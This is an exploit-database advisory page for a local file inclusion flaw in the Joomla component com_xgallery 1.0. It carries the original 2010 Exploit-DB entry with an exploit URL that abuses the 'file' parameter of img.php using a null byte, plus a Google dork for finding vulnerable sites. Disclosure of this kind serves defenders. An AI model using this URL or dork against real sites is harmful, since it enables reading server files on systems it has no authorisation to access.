header-logo
Suggest Exploit
vendor:
com_xgallery
by:
KelvinX
5.5
CVSS
MEDIUM
Local File Inclusion
22
CWE
Product Name: com_xgallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability

The Joomla component com_xgallery version 1.0 is vulnerable to local file inclusion. An attacker can exploit this vulnerability by accessing the img.php file with a specially crafted file parameter, allowing them to include arbitrary local files.

Mitigation:

Upgrade to the most recent version of the component.
Source

Exploit-DB raw data:

# Exploit Title: Joomla Component com_xgallery 1.0 Local File Inclusion Vulnerability
# Author: KelvinX (kelvinxgr@gmail.com)
# Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr
# Date: December, 21-2010
# Location: HCM City, Vietnam

 ------------------------

# Application: com_xgallery
# Version: 1.0
# Vendor: http://www.optikool.com/documentation/xmovie-component
# Google Dorks: inurl:com_xgallery

------------------------

Exploit: http://127.0.0.1/[path]/components/com_xgallery/helpers/img.php?file=[LFI]%00

------------------------

# Solution: Upgrade to the most recent version

Navigation

Suggest Exploit

Services By CQR